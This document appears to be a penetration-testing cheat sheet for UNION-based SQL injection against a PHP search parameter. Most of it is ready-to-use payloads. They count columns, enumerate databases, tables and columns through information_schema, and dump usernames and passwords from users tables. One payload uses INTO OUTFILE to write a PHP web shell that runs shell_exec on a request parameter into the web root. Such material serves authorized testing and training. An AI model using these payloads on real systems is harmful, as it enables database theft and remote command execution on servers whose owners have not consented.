# SQL Injection In The Search Field

### SQL Injection in search field

Let's say the search page is handled by a file named `sql.php` and the parameter is `search`, so a normal request looks like `sql.php?search=pentesting`. The first thing we try is to search with a single quote `'`:

```
sql.php?search='
```

If that returns a database error, the input is reaching the query unescaped and the field is very likely injectable (a generic error page is weaker evidence; compare it with the response to a harmless search). Our next step is to determine the number of columns in the original query, starting with a normal search to see what a good response looks like. Finding the number of columns:

```
sql.php?search=test' ORDER BY 1-- -
```

OR

```
sql.php?search=' ORDER BY 1--
```

We keep incrementing the number until the page errors. The first value that errors is one more than the number of columns, so the column count is the last value that still returned normally. Then we confirm it with a UNION query like the ones below:

```
sql.php?search=pentesting' union select 1,1,1,1,1,1,1#
```

OR

```
sql.php?search=' and 1 = 0 union all select 1,1,1,1,1,1,1 from information_schema.tables where 1=0 or 1=1-- '
```

We keep adding `1`s until the page no longer errors; the first width that is accepted is the column count, so count the `1`s. The `1`s also show which columns are echoed on the page, and those are the ones we replace with data. Then we try to find the database name and version, the table names, and the columns of the target table:

```
sql.php?search=pentesting' union select 1,database(),@@version,1,1,1,1#
```

OR

```
sql.php?search=' and 1 = 0 union all select 1,database(),@@version,1,1,1,1 from information_schema.tables where 1=0 or 1=1-- '
```

```
sql.php?search=pentesting' union select 1,table_name,1,1,1,1,1 from information_schema.tables#
```

OR

```
sql.php?search=' and 1 = 0 union all select 1,table_name,1,1,1,1,1 from information_schema.tables where 1=0 or 1=1-- '
```

```
sql.php?search=pentesting' union select 1,column_name,1,1,1,1,1 from information_schema.columns where table_name='users'#
```

OR

```
sql.php?search=' and 1 = 0 union all select 1,column_name,1,1,1,1,1 from information_schema.columns where table_name = 'users'-- '
```

```
sql.php?search=pentesting' union select 1,login,user,password,1,1,1 from users#
```

OR

```
sql.php?search=' and 1=0 union all select 1,login,password,secret,email,admin,7 from users-- -
```

```
sql.php?search=pentesting' union select 1,"<?php echo shell_exec($_GET['cmd'])?>",1,1,1,1,1 into outfile "/var/www/html/shell3.php"#
```

OR

```
sql.php?search=' and 1=0 union all select 1,"<?php echo shell_exec($_GET['cmd'])?>",1,1,1,1,1 into outfile "/var/www/html/shell3.php"#
```

Writing a web shell this way only works if the database account has the FILE privilege, `secure_file_priv` does not restrict the output directory (it points to a single directory on most default installs, or is set to NULL to disable writes entirely), the MySQL process can write to the web root, and the web root path is known. The other columns are written to the file too, so the shell is surrounded by `1` values and tab separators, which PHP passes through as plain text outside the `<?php ... ?>` tags.

#### Another method after finding the number of columns

Let's say we found there are three columns; we would continue this way:

```
searchitem=test' UNION SELECT 1,2,3-- -
```

```
searchitem=test' UNION SELECT 1,(select
group_concat(SCHEMA_NAME) from
INFORMATION_SCHEMA.SCHEMATA),3-- -
```

The SCHEMATA table specifically contains the names of databases MySQL knows about.

```
searchitem=test' UNION SELECT 1,(select
group_concat(TABLE_NAME) from
INFORMATION_SCHEMA.TABLES WHERE
TABLE_SCHEMA = 'db'),3-- -
```

Extracting the columns of a table:

```
searchitem=test' UNION SELECT 1,(select
group_concat(COLUMN_NAME) from
INFORMATION_SCHEMA.COLUMNS WHERE
TABLE_NAME = 'users'),3-- -
```

Extracting specific data from a column:

```
searchitem=test' UNION SELECT 1,(select group_concat(username) from db.users),3-- -
```

A bare `(select username from db.users)` only works when the table has a single row; with more rows MySQL fails with "Subquery returns more than 1 row", so wrap the column in `group_concat`.

OR

```
searchitem=test' UNION SELECT 1,concat(id,':',name,':',password),3 from users-- -
```

This form returns one result row per user, so no `group_concat` is needed; the `3` must come before `from users`, since everything after the column list belongs to the `SELECT`.

#### Another method to finding the number of columns and proceeding further

```
' UNION select 1 from
information_schema.tables #
' UNION select 1,2 from
information_schema.tables #
' UNION select 1,2,3 from
information_schema.tables #
```

The one that returns a normal page instead of an error tells us the number of columns. Proceeding:

```
' UNION select 1,table_schema,table_name
from information_schema.tables #
```

```
' UNION select 1,table_name,column_name
from information_schema.columns #
```

```
' UNION select 1,username,pwd from users #
```
